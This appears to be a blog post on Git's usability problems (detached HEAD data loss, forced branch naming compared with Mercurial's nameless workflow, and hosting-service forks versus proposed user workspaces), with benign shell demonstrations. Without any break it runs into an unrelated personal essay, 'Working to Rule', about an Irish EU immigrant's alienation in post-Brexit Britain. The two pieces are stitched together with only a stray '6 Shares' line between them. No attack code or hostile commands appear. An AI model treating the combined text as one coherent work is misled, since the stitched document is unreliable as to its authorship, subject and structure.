If we were designing a version control tool from scratch (or if you were a new user to version control), you would probably think that a sane feature/requirement would be to update to any revision and start making changes. In Git speak, this would be something like git checkout b201e96f, make some file changes, git commit. I think that's a pretty basic workflow requirement for a version control tool. And the workflow I suggested is pretty intuitive: choose the thing to start working on, make some changes, then save those changes.

Let's see what happens when we actually do this:

$ git checkout b201e96f
Note: checking out 'b201e96f'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at b201e96f94... Merge branch 'rs/config-write-section-fix' into maint

$ echo 'my change' >> README.md
$ git commit -a -m 'my change'
[detached HEAD aeb0c997ff] my change
 1 file changed, 1 insertion(+)

$ git push indygreg
fatal: You are not currently on a branch.
To push the history leading to the current (detached HEAD)
state now, use

    git push indygreg HEAD:<name-of-remote-branch>

$ git checkout master
Warning: you are leaving 1 commit behind, not connected to
any of your branches:

  aeb0c997ff my change

If you want to keep it by creating a new branch, this may be a good time
to do so with:

 git branch <new-branch-name> aeb0c997ff

Switched to branch 'master'
Your branch is up to date with 'origin/master'.

I know what all these messages mean because I've mastered Git. But if you were a newcomer (or even a seasoned user), you might be very confused. Just so we're on the same page, here is what's happening (along with some commentary).

When I run git checkout b201e96f, Git is trying to tell me that I'm potentially doing something that could result in the loss of my data. A golden rule of version control tools is don't lose the user's data. When I run git checkout, Git should be stating the risk for data loss very clearly. But instead, the If you want to create a new branch sentence is hiding this fact by instead phrasing things around retaining commits you create rather than the possible loss of data. It's up to the user to make the connection that retaining commits you create actually means don't eat my data. Preventing data loss is critical and Git should not mince words here!

The git commit seems to work like normal. However, since we're in a detached HEAD state (a phrase that is likely gibberish to most users), that commit isn't referred to by any ref, so it can be lost easily. Git should be telling me that I just committed something it may not be able to find in the future. But it doesn't. Again, Git isn't being as protective of my data as it needs to be.

The failure in the git push command is essentially telling me I need to give things a name in order to push. Pushing is effectively remote save. And I'm going to apply my reasoning about version control tools not interfering with save to pushing as well: Git is adding an extra barrier to remote save by refusing to push commits without a branch attached and by doing so is being user hostile.

Finally, we git checkout master to move to another commit. Here, Git is actually doing something halfway reasonable. It is telling me I'm leaving commits behind, which commits those are, and the command to use to keep those commits. The warning is good but not great. I think it needs to be stronger to reflect the risk around data loss if that suggested Git command isn't executed. (Of course, the reflog for HEAD will ensure that data isn't immediately deleted. But users shouldn't need to involve reflogs to not lose data that wasn't rewritten.)

The point I want to make is that Git doesn't allow you to just update and save. Because its dumb store requires pointers to relevant commits (refs) and because that requirement isn't abstracted away or paved over by user-friendly features in the frontend, Git is effectively requiring end-users to define names (branches) for all commits. If you fail to define a name, it gets a lot harder to find your commits, exchange them, and Git may delete your data. While it is technically possible to not create branches, the version control tool is essentially unusable without them.

When local branches are exchanged, they appear as remote branches to others. Essentially, you give each instance of the repository a name (the remote). And branches/refs fetched from a named remote appear as a ref in the ref namespace for that remote. e.g. refs/remotes/origin holds refs for the origin remote. (Git allows you to not have to specify the refs/remotes part, so you can refer to e.g. refs/remotes/origin/master as origin/master.)

Again, if you were designing a version control tool from scratch or you were a new Git user, you'd probably think remote refs would make good starting points for work. For example, if you know you should be saving new work on top of the master branch, you might be inclined to begin that work by running git checkout origin/master. But like our specific-commit checkout above:

$ git checkout origin/master
Note: checking out 'origin/master'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 95ec6b1b33... RelNotes: the eighth batch

This is the same message we got for a direct checkout. But we did supply a ref/remote branch name. What gives? Essentially, Git tries to enforce that the refs/remotes/ namespace is read-only and only updated by operations that exchange data with a remote, namely git fetch, git pull, and git push.

For this to work correctly, you need to create a new local branch (which initially points to the commit that refs/remotes/origin/master points to) and then switch/activate that local branch.
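In command form, that step might look like the sketch below. It builds a small upstream repository and a clone so that it runs on its own; the directory names and the branch name my-feature are placeholders.

```shell
set -e
base=$(mktemp -d)
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

# A stand-in for the remote repository.
git init -q "$base/upstream"
cd "$base/upstream"
git symbolic-ref HEAD refs/heads/master
echo readme > README.md
git add README.md
git commit -q -m 'initial'

# The clone gets refs/remotes/origin/master for free.
git clone -q "$base/upstream" "$base/work"
cd "$base/work"

# Create a local branch starting at origin/master and switch to it.
git checkout -q --track -b my-feature origin/master

current=$(git symbolic-ref --short HEAD)
tracking=$(git rev-parse --abbrev-ref 'my-feature@{upstream}')
echo "on $current, tracking $tracking"
```

Commits made from here update refs/heads/my-feature, so they stay reachable and can be pushed without the detached HEAD warnings.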

I could go on talking about all the subtle nuances of how Git branches are managed. But I won't.

If you've used Git, you know you need to use branches. You may or may not recognize just how frequently you have to type a branch name into a git command. I guarantee that if you are familiar with version control tools and workflows that aren't based on having to manage refs to track data, you will find Git's forced usage of refs and branches a bit absurd. I half jokingly refer to Git as Game of Refs. I say that because coming from Mercurial (which doesn't require you to name things), Git workflows feel to me like all I'm doing is typing the names of branches and refs into git commands. I feel like I'm wasting my precious time telling Git the names of things only because this is necessary to placate the leaky abstraction of Git's storage layer which requires references to relevant commits.

Git and version control don't have to be this way.

As I said, my Mercurial workflow doesn't rely on naming things. Unlike Git, Mercurial's store has an explicit (not shared) storage location for commits (changesets in Mercurial parlance). And this data structure is ordered, meaning a changeset always occurs after its parent/predecessor. This means that Mercurial can open a single file/index to quickly find all changesets. Because Mercurial doesn't need pointers to commits of relevance, names aren't required.

My Zen of Mercurial moment came when I realized you didn't have to name things in Mercurial. Having used Git before Mercurial, I was conditioned to always be naming things. This is the Git way after all. And, truth be told, it is common to name things in Mercurial as well. Mercurial's named branches were the way to do feature branches in Mercurial for years. Some used the MQ extension (essentially a port of quilt), which also requires naming individual patches. Git users coming to Mercurial were missing Git branches and Mercurial's bookmarks were a poor port of Git branches.

But recently, more and more Mercurial users have been coming to the realization that names aren't really necessary. If the tool doesn't actually require naming things, why force users to name things? As long as users can find the commits they need to find, do you actually need names?

As a demonstration, my Mercurial workflow leans heavily on the hg show work and hg show stack commands. You will need to enable the show extension by putting the following in your hgrc config file to use them:

[extensions]
show =

Running hg show work (I have also set the config commands.show.aliasprefix=s to enable me to type hg swork) finds all in-progress changesets and other likely-relevant changesets (those with names and DAG heads). It prints a concise DAG of those changesets:

hg show work output

And hg show stack shows just the current line of work and its relationship to other important heads:

hg show stack output

Aside from the @ bookmark/name set on that top-most changeset, there are no names! (That @ comes from the remote repository, which has set that name.)

Outside of code archeology workflows, hg show work shows the changesets I care about 95% of the time. With all I care about (my in-progress work and possible rebase targets) rendered concisely, I don't have to name things because I can just find whatever I'm looking for by running hg show work! Yes, you need to run hg show work, visually scan for what you are looking for, and copy a (random) hash fragment into a number of commands. This sounds like a lot of work. But I believe it is far less work than naming things. Only when you practice this workflow do you realize just how much time you actually spend finding and then typing names into hg and - especially - git commands! The ability to just hg update to a changeset and commit without having to name things is just so liberating. It feels like my version control tool is putting up fewer barriers and letting me work quickly.

Another benefit of hg show work and hg show stack is that they present a concise DAG visualization to users. This helps educate users about the underlying shape of repository data. When you see connected nodes on a graph and how they change over time, it makes it a lot easier to understand concepts like merge and rebase.

This nameless workflow may sound radical. But that's because we're all conditioned to naming things. I initially thought it was crazy as well. But once you have a mechanism that gives you rapid access to data you care about (hg show work in Mercurial's case), names become very optional. Now, a pure nameless workflow isn't without its limitations. You want names to identify the main targets for work (e.g. the master branch). And when you exchange work with others, names are easier to work with, especially since names survive rewriting. But in my experience, most of my commits are only exchanged with me (synchronizing my in-progress commits across devices) and with code review tools (which don't really need names and can operate against raw commits). My most frequent use of names comes when I'm in repository maintainer mode and I need to ensure commits have names for others to reference.

Could Git support nameless workflows? In theory it can.

Git needs refs to find relevant commits in its store. And the wire protocol uses refs to exchange data. So refs have to exist for Git to function (assuming Git doesn't radically change its storage and exchange mechanisms to mitigate the need for refs, but that would be a massive change and I don't see this happening).

While there is a fundamental requirement for refs to exist, this doesn't necessarily mean that user-facing names must exist. The reason that we need branches today is because branches are little more than a ref with special behavior. It is theoretically possible to invent a mechanism that transparently maps nameless commits onto refs. For example, you could create a refs/nameless/ namespace that was automatically populated with DAG heads that didn't have names attached. And Git could exchange these refs just like it can branches today. It would be a lot of work to think through all the implications and to design and implement support for nameless development in Git. But I think it is possible.
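A very rough approximation of that idea can be scripted with today's plumbing. In the sketch below, a commit made without a branch is recorded under refs/nameless/, which is a made-up namespace that Git knows nothing about, and the commit then survives an aggressive garbage collection. A real implementation would need to populate and prune such refs automatically; this only shows that a ref outside refs/heads/ is enough to keep a commit alive and discoverable.

```shell
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git symbolic-ref HEAD refs/heads/trunk   # arbitrary branch name for the demo
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

echo base > file.txt
git add file.txt
git commit -q -m 'base'

# Work without naming anything.
git checkout -q --detach
echo idea >> file.txt
git commit -q --all -m 'unnamed work'
head=$(git rev-parse HEAD)

# Hypothetical convention: track the nameless head under refs/nameless/.
git update-ref "refs/nameless/$head" "$head"

# Leave the commit, then do everything that would normally destroy it.
git checkout -q trunk
git reflog expire --expire=now --all
git gc -q --prune=now

if git cat-file -e "$head" 2>/dev/null; then kept=yes; else kept=no; fi
nameless=$(git for-each-ref --format='%(refname)' refs/nameless/)
echo "kept: $kept, tracked as: $nameless"
```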

I encourage the Git community to investigate supporting nameless workflows. Having adopted this workflow in Mercurial, Git's workflow around naming branches feels heavyweight and restrictive to me. Put another way, nameless commits are actually lighter-weight branches than Git branches! To the common user who just wants version control to be a save feature, requiring names establishes a barrier towards that goal. So removing the naming requirement would make Git simpler and more approachable to new users.

Forks aren't the Model You are Looking For

This section is more about hosted Git services (like GitHub, Bitbucket, and GitLab) than Git itself. But since hosted Git services are synonymous with Git and interaction with a hosted Git service is a regular part of a common Git user's workflow, I feel like I need to cover it. (For what it's worth, my experience at Mozilla tells me that a large percentage of people who say I prefer Git or we should use Git actually mean I like GitHub. Git and GitHub/Bitbucket/GitLab are effectively the same thing in the minds of many and anyone finding themselves discussing version control needs to keep this in mind because Git is more than just the command line tool: it is an ecosystem.)

I'll come right out and say it: I think forks are a relatively poor model for collaborating. They are light years better than what existed before. But they are still so far from the turn-key experience that should be possible. The fork hasn't really changed much since the current implementation of it was made popular by GitHub many years ago. And I view this as a general failure of hosted services to innovate.

So we have a shared understanding, a fork (as implemented on GitHub, Bitbucket, GitLab, etc) is essentially a complete copy of a repository (a git clone if using Git) and a fresh workspace for additional value-added services the hosting provider offers (pull requests, issues, wikis, project tracking, release tracking, etc). If you open the main web page for a fork on these services, it looks just like the main project's. You know it is a fork because there are cosmetics somewhere (typically next to the project/repository name) saying forked from.

Before service providers adopted the fork terminology, fork was used in open source to refer to a splintering of a project. If someone or a group of people didn't like the direction a project was taking, wanted to take over ownership of a project because of stagnation, etc, they would fork it. The fork was based on the original (and there may even be active collaboration between the fork and original), but the intent of the fork was to create distance between the original project and its new incarnation: a new entity that was sufficiently independent of the original.

Forks on service providers mostly retain this old school fork model. The fork gets a new copy of issues, wikis, etc. And anyone who forks establishes what looks like an independent incarnation of a project. It's worth noting that the execution varies by service provider. For example, GitHub won't enable Issues for a fork by default, thereby encouraging people to file issues against the upstream project it was forked from. (This is good default behavior.)

And I know why service providers (initially) implemented things this way: it was easy. If you are building a product, it's simpler to just say a user's version of this project is a git clone and they get a fresh database. On a technical level, this meets the traditional definition of fork. And rather than introduce a new term into the vernacular, they just re-purposed fork (albeit with softer connotations, since the traditional fork commonly implied there was some form of strife precipitating a fork).

To help differentiate flavors of forks, I'm going to define the terms soft fork and hard fork. A soft fork is a fork that exists for purposes of collaboration. The differentiating feature between a soft fork and hard fork is whether the fork is intended to be used as its own project. If it is, it is a hard fork. If not - if all changes are intended to be merged into the upstream project and be consumed from there - it is a soft fork.

I don't have concrete numbers, but I'm willing to wager that the vast majority of forks on Git service providers which have changes are soft forks rather than hard forks. In other words, these forks exist purely as a conduit to collaborate with the canonical/upstream project (or to facilitate a short-lived one-off change).

The current implementation of fork - which borrows a lot from its predecessor of the same name - is a good - but not great - way to facilitate collaboration. It isn't great because it technically resembles what you'd expect to see for hard fork use cases even though it is used predominantly with soft forks. This mismatch creates problems.

If you were to take a step back and invent your own version control hosted service and weren't tainted by exposure to existing services and were willing to think a bit beyond making it a glorified frontend for the git command line interface, you might realize that the problem you are solving - the product you are selling - is collaboration as a service, not a Git hosting service. And if your product is collaboration, then implementing your collaboration model around the hard fork model with strong barriers between the original project and its forks is counterproductive and undermines your own product. But this is how GitHub, Bitbucket, GitLab, and others have implemented their product!

To improve collaboration on version control hosted services, the concept of a fork needs to be significantly curtailed. Replacing it should be a UI and workflow that revolves around the central, canonical repository.

You shouldn't need to create your own clone or fork of a repository in order to contribute. Instead, you should be able to clone the canonical repository. When you create commits, those commits should be stored and/or more tightly affiliated with the original project - not inside a fork.

One potential implementation is doable today. I'm going to call it workspaces. Here's how it would work.

There would exist a namespace for refs that can be controlled by the user. For example, on GitHub (where my username is indygreg), if I wanted to contribute to some random project, I would git push my refs somewhere under refs/users/indygreg/ directly to that project's repository. No forking necessary. If I wanted to contribute to a project, I would just clone its repo then push to my workspace under it. You could do this today by configuring your Git refspec properly. For pushes, it would look something like refs/heads/*:refs/users/indygreg/* (that tells Git to map local refs under refs/heads/ to refs/users/indygreg/ on that remote repository). If this became a popular feature, presumably the Git wire protocol could be taught to advertise this feature such that Git clients automatically configured themselves to push to user-specific workspaces attached to the original repository.
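The refspec part of this works with stock Git, as the following sketch suggests. A local bare repository stands in for the hosted project, and the branch name my-fix is a placeholder. Whether a real hosting service would accept pushes to refs/users/ is a separate question; this only shows the client-side configuration.

```shell
set -e
base=$(mktemp -d)
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

# Stand-in for the canonical project on the server.
git init -q --bare "$base/project.git"

# Clone the project itself; no fork involved.
git clone -q "$base/project.git" "$base/work" 2>/dev/null
cd "$base/work"
git symbolic-ref HEAD refs/heads/my-fix
echo fix > fix.txt
git add fix.txt
git commit -q -m 'my fix'

# Map local branches into a per-user namespace on the remote.
git config remote.origin.push 'refs/heads/*:refs/users/indygreg/*'
git push -q origin

# See which refs the server ended up with.
server_refs=$(git --git-dir="$base/project.git" for-each-ref --format='%(refname)')
echo "$server_refs"
```

Because the mapping lives in remote.origin.push, a plain git push origin is enough afterwards; nothing lands under refs/heads/ on the server.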

There are several advantages to such a workspace model. Many of them revolve around eliminating forks.

At initial contribution time, no server-side fork is necessary in order to contribute. You would be able to clone and contribute without waiting for or configuring a fork. Or if you can create commits from the web interface, the clone wouldn't even be necessary! Lowering the barrier to contribution is a good thing, especially if collaboration is the product you are selling.

In the web UI, workspaces would also revolve around the source project and not be off in their own world like forks are today. People could more easily see what others are up to. And fetching their work would require typing in their username as opposed to configuring a whole new remote. This would bring communities closer and hopefully lead to better collaboration.

Not requiring forks also eliminates the need to synchronize your fork with the upstream repository. I don't know about you, but one of the things that bothers me about the Game of Refs that Git imposes is that I have to keep my refs in sync with the upstream refs. When I fetch from origin and pull down a new master branch, I need to git merge that branch into my local master branch. Then I need to push that new master branch to my fork. This is quite tedious. And it is easy to merge the wrong branches and get your branch state out of whack. There are better ways to map remote refs into your local names to make this far less confusing.
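For reference, the synchronization dance described above looks roughly like this when scripted end to end. Local bare repositories stand in for the upstream project and the server-side fork, and the remote name upstream and all paths are assumptions for the demo.

```shell
set -e
base=$(mktemp -d)
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

# Upstream project with one commit on master.
git init -q --bare "$base/upstream.git"
git --git-dir="$base/upstream.git" symbolic-ref HEAD refs/heads/master
git clone -q "$base/upstream.git" "$base/seed" 2>/dev/null
cd "$base/seed"
echo v1 > file.txt
git add file.txt
git commit -q -m 'v1'
git push -q origin master

# The server-side fork, and the contributor's clone of that fork.
git clone -q --bare "$base/upstream.git" "$base/fork.git"
git clone -q "$base/fork.git" "$base/work"
cd "$base/work"
git remote add upstream "$base/upstream.git"

# Upstream moves ahead.
cd "$base/seed"
echo v2 >> file.txt
git commit -q --all -m 'v2'
git push -q origin master

# Three steps just to bring the fork back in sync.
cd "$base/work"
git fetch -q upstream
git merge -q --ff-only upstream/master
git push -q origin master

fork_master=$(git --git-dir="$base/fork.git" rev-parse refs/heads/master)
upstream_master=$(git --git-dir="$base/upstream.git" rev-parse refs/heads/master)
echo "fork: $fork_master upstream: $upstream_master"
```

The final push uploads commits the hosting server already has in the upstream repository, which is the redundant transfer a workspace model would avoid.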

Another win here is not having to push and store data multiple times. When working on a fork (which is a separate repository), after you git fetch changes from upstream, you need to eventually git push those into your fork. If you've ever worked on a large repository and didn't have a super fast Internet connection, you may have been stymied by having to git push large amounts of data to your fork. This is quite annoying, especially for people with slow Internet connections. Wouldn't it be nice if that git push only pushed the data that was truly new and didn't already exist somewhere else on the server? A workspace model where development all occurs in the original repository would fix this. As a bonus, it would make the storage problem on servers easier because you would eliminate thousands of forks and you probably wouldn't have to care as much about data duplication across repos/clones because the version control tool solves a lot of this problem for you, courtesy of having all data live alongside or in the original repository instead of in a fork.

Another win from workspace-centric development would be the potential to do more user-friendly things after pull/merge requests are incorporated in the official project. For example, the ref in your workspace could be deleted automatically. This would ease the burden on users to clean up after their submissions are accepted. Again, instead of mashing keys to play the Game of Refs, this would all be taken care of for you automatically. (Yes, I know there are scripts and shell aliases to make this more turn-key. But user-friendly behavior shouldn't have to be opt-in: it should be the default.)

But workspaces aren't all rainbows and unicorns. There are access control concerns. You probably don't want users able to mutate the workspaces of other users. Or do you? You can make a compelling case that project administrators should have that ability. And what if someone pushes bad or illegal content to a workspace and you receive a cease and desist? Can you take down just the offending workspace while complying with the order? And what happens if the original project is deleted? Do all its workspaces die with it? These are not trivial concerns. But they don't feel impossible to tackle either.

Workspaces are only one potential alternative to forks. And I can come up with multiple implementations of the workspace concept. Although many of them are constrained by current features in the Git wire protocol. But Git is (finally) getting a more extensible wire protocol, so hopefully this will enable nice things.

I challenge Git service providers like GitHub, Bitbucket, and GitLab to think outside the box and implement something better than how forks are implemented today. It will be a large shift. But I think users will appreciate it in the long run.

Conclusion

Git is a ubiquitous version control tool. But it is frequently lampooned for its poor usability and documentation. We even have research papers telling us which parts are bad. Nobody I know has had a pleasant initial experience with Git. And it is clear that few people actually understand Git: most just know the command incantations they need to know to accomplish a small set of common activities. (If you are such a person, there is nothing to be ashamed about: Git is a hard tool.)

Popular Git-based hosting and collaboration services (such as GitHub, Bitbucket, and GitLab) exist. While they've made strides to make it easier to commit data to a Git repository (I purposefully avoid saying use Git because the most usable tools seem to avoid the git command line interface as much as possible), they are often a thin veneer over Git itself (see forks). And Git is a thin veneer over a content indexed key-value store (see forced usage of branches).

As an industry, we should be concerned about the lousy usability of Git and the tools and services that surround it. Some may say that Git - with its near monopoly over version control mindshare - is a success. I have a different view: I think it is a failure that a tool with a user experience this bad has achieved the success it has.

The cost of Git's poor usability can be measured in tens if not hundreds of millions of dollars in time people have wasted because they couldn't figure out how to use Git. Git should be viewed as a source of embarrassment, not a success story.

What's really concerning is that the usability problems of Git have been known for years. Yet it is as popular as ever and there have been few substantial usability improvements. We do have some alternative frontends floating around. But these haven't caught on.

I'm at a loss to understand how an open source tool as popular as Git has remained so mediocre for so long. The source code is out there. Anybody can submit a patch to fix it. Why is it that so many people get tripped up by the same poor usability issues years after Git became the common version control tool? It certainly appears that as an industry we have been unable or unwilling to address systemic deficiencies in a critical tool. Why this is, I'm not sure.

Despite my pessimism about Git's usability and its poor track record of being attentive to the needs of people who aren't power users, I'm optimistic that the future will be brighter. While the ~7000 words in this post pale in comparison to the aggregate word count that has been written about Git, hopefully this post strikes a nerve and causes positive change. Just because one generation has toiled with the usability problems of Git doesn't mean the next generation has to suffer through the same. Git can be improved and I encourage that change to happen. The three issues above and their possible solutions would be a good place to start.

Working to Rule

6 Shares

“Not my circus, not my monkeys”.

That’s what I mostly say these days when asked about British politics. Up to about a year ago, I was an active member of a political party and involved in a fair amount of volunteering. I saw myself as being part of things, an enthusiastic party to the social contract. Those days are done.

I’ve been an immigrant in four different countries, and in only one of them did I ever feel at home. I used to tell this story about being a civil liberties lobbyist in the UK in the early 2000s. I’d go and do a briefing over tea and biscuits with some member of the House of Lords. They’d start a little in surprise at my accent, and then the meeting would go on as normal, with me offering talking points about the surveillance and police state as counter-productive in fighting terrorism. Then at the end, when the business of the meeting was finished and everyone relaxed and munched the biscuits, the peer would make a point of telling me how much they liked Ireland, had relatives there, had visited or wanted to, some day. As if they were saying “It’s ok for Irish people to lecture us on human rights and terrorism, now.” My story was about tolerance and civility, and how no way could an Arab have a similar meeting in Paris or Washington D.C.

Maybe it’s just as well we white, well-to-do professionals are getting the same stick other immigrants or minorities always have. The gloves are off. An Italian friend was accosted by two men in the cinema queue in Oxford and told to “go home”, for the crime of speaking Italian. (Because she’s a badass, she bought them popcorn and they didn’t know what to do with themselves.) A woman I met last week was abused in the street for speaking Polish on her phone. I can pass until I open my mouth, and if I try I can sound fairly British. But I don’t want to.

Perhaps the UK only feels significantly nastier because it now treats white, middle class EU people more like how it treats the brown-skinned, less connected, less wealthy, or less likely to be able to kick up a stink people. My kind can still get a Guardian sad-face piece if the Home Office messes us around. We have our liberty and our voice. But can any of us say we know what is going on in, say, Yarl’s Wood detention centre, or that its secrecy, authoritarianism and arms-length contractual deniability are not the perfect conditions for institutional abuse? We’ve all heard that kind of story a dozen times, but can no longer even be arsed to say “never again”.

I live in Theresa May’s “hostile environment” for immigrants, seeded several years ago, and bearing poisonous fruit just this morning as the first day when foreign-seeming people can be stopped from using the NHS. EU citizens are still a lot more equal than other immigrants. (And Irish people more equal again, in terms of our legal status, because of history.) I’m extremely lucky. All I have to worry about are the value of my home slipping (frightening for us, but a property crash would help more people than it hurts, generationally), my ability to find work (most of mine comes from outside the UK, anyway), and the rather bad luck that every time I try to send money to my under-water Irish mortgage, the prime minister opens her mouth and the pound plummets, again. My concerns are incredibly minor and show just how privileged I am.

I’m not getting letters from the Home Office, telling me to leave, or bills from my local NHS’s fraud department, insisting my newborn had no right to treatment. I have no relatives caught up in the grey netherworld of the asylum system, being told they weren’t actually raped and they’re not actually gay, and will therefore be detained without time-limit. I don’t have to prove to a sociopathic immigration regime that, although I spend my time caring for children or ill family members now, I will in the future earn enough money to not be a “burden”. I don’t need to fear that calling the police to protect my children from domestic violence will result in the Home Office being alerted to our presence, and the whole family being deported.

The UK has become a nasty little country. It sticks out a bit less in a neighbourhood with Austria, Hungary, Poland and Turkey nearby. But as a country, the UK is working hard to make itself objectively nastier, and to suppress the voices of those in British society who could curb its sharpest, most small-minded insecurities. Charities here are gagged from speaking about poverty, church-leaders and protesters go unreported and ignored. Xenophobic attacks are up by almost a third, since the Brexit vote. The government and media think it’s unremarkable for people on benefits – and their children – to go without a penny of income for two or three months at a time. (And when they eventually get paid, to go without when there’s a fifth Monday in the month.) Women inmates in the prison system have a lower chance of survival than did British soldiers in Afghanistan. The education system is expressly designed to herd the 93% with rote-learning, box-ticking and arbitrary discipline into a life of menial under-employment, while the 7% enjoy Olympic-sized swimming pools and theatres better equipped than most professional ones. And when privatized state school “academy” chains go tits-up, the funds raised by their Christmas fairs and sponsored runs are asset-stripped by company directors, but private schools for the wealthiest are officially charities, with £100 million in tax benefits a year. The country’s flagship news programme thinks “balance” is pitting a soft versus a hard brexiteer, and the millionaire-funded Leave campaign admits using botnets to spread its lies, but no one even shrugs.

But there you go. That’s how I would see things, wouldn’t I? What with being a saboteur and enemy of the state, and a foreigner, to boot.

Anyone who thinks being an immigrant, even a deluxe EU three million-type immigrant, is easy, should try it. We compete on equal terms with all comers, but with no social or economic safety net and, for many, hustling like mad in second and third languages. No dole, no network of couches to sleep on, no contacts and no introductions; qualifications from institutions you’ve never heard of, references from employers you aren’t sure are real but can’t be bothered to check, acting as daily fodder for stereotypical jokes we laugh off to show we’re one of you. You don’t hear us complaining about it because it’s just part of the deal. But when the terms of the deal change, and you tell us we’re social welfare parasites who are also, somehow, taking all the jobs and are the reason the country is failing, then the deal is probably dead.

The government and brexiteers’ empty claims that “it’ll be fine” are not reassuring. They unwittingly communicate the contempt we are held in, the manifest unimportance of our plight. I don’t see acres of think-pieces on why the government and the Labour party should ‘reach out’ to economic migrants and try to understand us. Ironically, we’re the ones keeping the stiff upper lip because we know we’re not allowed the luxury of an epic, country-wide tantrum.

Right after the brexit result, I felt sorriest for my British friends who were having part of their identity yanked away. I’ve even been told once or twice in the last year that it was worse for them, because at least I could move away. And I agreed. But I don’t any more. Their lives are going on as before, albeit in a poisonous political atmosphere. But ours have changed. EU citizens in the UK worry about their ability to stay employed, are being refused mortgages and rental contracts, are shouted at in the street, don’t know what will become of their pension contributions and fear they could be just one family crisis away from losing their “right to remain”.

I thought I would feel better over time. That the sorrow and fear at being in a country turning its back on internationalism at the precise historic moment when our biggest problems are cross-border would be replaced by something less painful and more constructive. After the referendum I went to a few more meetings. Over the winter I made signs for protest marches. After the women’s march last January, I felt I could almost breathe again. But since then it’s just gotten worse. A couple of times this year, I’ve been on the phone to my mother in Ireland and she’s repeatedly asked “But don’t they know…” about certain pertinent economic facts or how treaties work or what happens when the peace process collapses. And I have to answer that no, honestly, a lot of people don’t know the basic facts of their own existence, and it is no longer politically feasible for politicians to mention these facts. And that most newspapers do not report these facts because these facts have become unpatriotic. And that there is no opposition. And that lies, repeated often and brazenly enough, are pretty much all that is left of British politics.

I suppose part of my feeling worse over time is that Britain is actively choosing to be this way. The liars lie and you pretend to give them a hearing. The poor suffer, and sometimes burn, but can’t be saved or housed. The immigrants take their lumps, and plan, and quietly disappear. And the politicians give a week and more to standing around, whining about a fucking clock, and pronounce any work on fixing the mess they’ve made impossible until a farcically bad election campaign has been fought, or party conference season is over or whatever the next Conservative psycho-drama is going to be has played out, while the country stumbles over the cliff because democracy, it now appears, was a one-shot deal.

In all that mess, here’s one thing among the many that seems to have gone unnoticed. When you reduce all your dealings with a group of people to the purely transactional, you may think you are being very clever and forcing a better deal, but you have changed the way those people will interact with you, and also whether they will trust you in future. I used to be an immigrant who, for all the UK’s shortcomings, felt loyalty to my chosen home. And gratitude, though it’s embarrassing to admit that, now. I knew there were certain ways of acting and being the UK had developed for itself – to do with tolerance, civility, self-deprecation, humour, curiosity, a general broad-mindedness and the underlying cultural confidence of a country that knows cooperation isn’t a zero-sum game – that meant there was room for people like me to belong.

(That same expansiveness could be seen in how this country treated its poor, less educated, chronically ill, disabled people, to mention just a few groups. Britain has never had much of a political culture of solidarity or shared purpose, whatever World War II fantasies claim, but it wasn’t vindictive. Now it is. Turn on the television. “Factual television” doesn’t inform or entertain; it pits people against each other in artificial competitions with ever more theatrical ways to tell the losers exactly what they are.)

By reducing the British state’s relationship with the three million EU citizens who live here to a single cost-benefit analysis (calculated with striking actuarial incompetence), the UK has made the mistake so many employers make when they put the bean-counters in charge. They have failed to account for the value of good will. Good will of a company’s suppliers and customers – analogous to a country’s partners and allies – has a value and can be destroyed. Similarly, working to rule is often one of the first steps employees – in this analogy, immigrants – take towards industrial action. Working to rule demonstrates that for all the Taylorist calculation of what a job entails, it’s the extra 15-20% we do that makes the world go round. The government seems to think it is grown-up and serious to treat us like economic widgets that can be ordered when needed and discarded when not. It’s wrong. It will lose out, too, from making citizenship and belonging purely transactional.

Many immigrants who had felt loyalty, affection and feelings of grateful belonging are now emotionally working to rule. We will go through the motions, paying our taxes and being decent neighbours, perhaps even wearing a poppy, as that ever-lengthening season draws near. But we know our place, now. We get it. We’re not proper citizens, just “economic migrants” or “citizens of nowhere”; assets to be sorted, milked of taxes and then disposed of when no longer revenue-positive. The loyalty that makes people stick around when you’re going through a tough time, as the UK is clearly about to, has gone. The soft power it yielded, by way of people who moved here and, when the time came, moved on with deep ties and happy memories, has gone. This isn’t about revenge, it’s just how the human heart works.

Because it hurts, for me at least. I believed all that inclusive, expansive, tolerance stuff in the first place. Never, in my couple of years as an army wife, did anyone grimace or hesitate or show hostility or even surprise at me being a non-national. There were lots of us amongst the spouses and soldiers; Irish, South Africans, Fijians and more. I baked, fund-raised, spent half a year in the permanent nausea of low-level fear while he was on tour, sat uncomfortably near the front of the church by a coffin with the Union Jack draped over it, comforted – insofar as anyone can – a grieving father, wrote letters of condolence, stood for hours on parade grounds and performed dozens (hundreds?) of the little tasks and favours that just make things go round when you live inside an institution that can ask you for almost anything.

And now I feel like a stupid, naive little fool. I look back on that time and think what baseless, idiotic, pathetic faith I had in something it turns out didn’t exist. Or if it did, it’s gone, so it all meant nothing, anyway.

Whatever the UK does now, the trust, loyalty and affection are gone, and they won’t come back. We know we can’t plan our lives with any certainty. We know we are despised by a large amount of the country, including the government itself. We know the majority of people voted to make our lives unmanageable because they didn’t want to know or just didn’t care. We have all the hurt feelings of kids who used to be in the clique and got kicked out for some unknown slight, but still have to go to school every day anyway. And I use that metaphor advisedly, because I understand that there is something slightly child-like in this feeling of rejection.

